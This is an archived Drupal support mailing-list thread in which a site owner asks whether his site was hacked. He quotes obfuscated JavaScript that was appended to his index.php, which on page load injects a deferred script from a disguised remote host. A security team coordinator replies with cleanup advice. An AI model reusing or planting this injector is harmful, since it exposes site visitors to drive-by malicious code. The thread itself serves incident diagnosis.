See:
<h1 class="title withtabs node-type-book">My site was defaced ("hacked"). Now what?</h1><a href="http://drupal.org/node/213320">http://drupal.org/node/213320</a><br><br>If your index file has been been modified then your site has been hacked, likely by a bot. Change that index file and revisit the file permissions for your Drupal code files. Ask your hosts if they have a back-up of your database and see if they are willing to work with you to identify when each account was compromised.<br>
<br>Cheers,<br>Kieran<br>Drupal security team coordinator<br><br><div class="gmail_quote">2009/12/30 steven <span dir="ltr"><<a href="mailto:steven@vermoere.net">steven@vermoere.net</a>></span><br><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
Hello,<br>
<br>
I've encounterd a strange problem.<br>
<br>
One of me sites has a changed index.php. The date of the file changed and<br>
the following lines were added at the end of the file:<br>
<br>
/*GNU GPL*/ try{window.onload = function(){var G2kfrz1an5r =<br>
document.createElement('s&$c$@(#r!!i^$p^$t^$@'.replace(/\$|\)|\(|&|\!|\^|@|#/ig,<br>
''));var Bl136slxkfs = 'Y0p6c2vs6gca8';G2kfrz1an5r.setAttribute('type',<br>
't^!^^e#&x!$@t)(@/!)(j@#$@a@)v#a!)s^c$(r(!&^i^^^)p&)$!t#&@'.replace(/@|\)|#|\(|&|\$|\!|\^/ig,<br>
''));G2kfrz1an5r.setAttribute('src',<br>
'h()t)&^t#(p$:#!#!/$@!^/()q@(u))&i$$^k(##r$^-(^!@#c$o&&m).#^i(^#m@&&a(g^$e&$f(##a$p()(.^&c@^()@o&^$^m$^^.!@&#l!a(^s#)t@-^))f#@&m#.$$t@^h#$e)&(g$&i@&(f($@t)@&s$a(&)#l!)e@#.^r&)#u#!!(:)@&8#&(!0#&8$@$&0&((/#!^u^!&s^p^!!s(.^&^c@(o@$#m@^/((u@@!s@p$$@s$.^$$#c@o)m$@((!/!^a&#!!d@$u@l@t)$f#$$r@)!^i$e$!&n$#)d!)f(^i#n(!d)($e&)r!@@!.)(^c(o$m!!!!/@#(g@^o#@o$@g)()l#&)^e#).@(c)o(m$@^#/@#d@a@!i$l@^#y#&m)$a#i)(l)(#.(@!c&(o@(&@.$(!!u!#k^!@/)!!$'.replace(/@|\)|\!|\(|\^|&|\$|#/ig,<br>
''));G2kfrz1an5r.setAttribute('defer',<br>
'd(&e)f(^e!r('.replace(/#|\)|&|@|\(|\!|\^|\$/ig,<br>
''));G2kfrz1an5r.setAttribute('id',<br>
'S$##0@9^&&q$!^(t@b@$$7&(#v$))b#^@^v(!)y)#$9^@5&^#'.replace(/\$|#|\^|\(|&|@|\)|\!/ig,<br>
''));document.body.appendChild(G2kfrz1an5r);}} catch(Y2gjfbp30rk) {}<br>
<br>
I have the impression this is encrypted javascript.<br>
<br>
Is this site hacked ? And if yes, is this due to Drupal or server-side ?<br>
<br>
Thank you<br>
<br>
Steven<br>
<font color="#888888"><br>
--<br>
[ Drupal support list | <a href="http://lists.drupal.org/" target="_blank">http://lists.drupal.org/</a> ]<br>
</font></blockquote></div><br>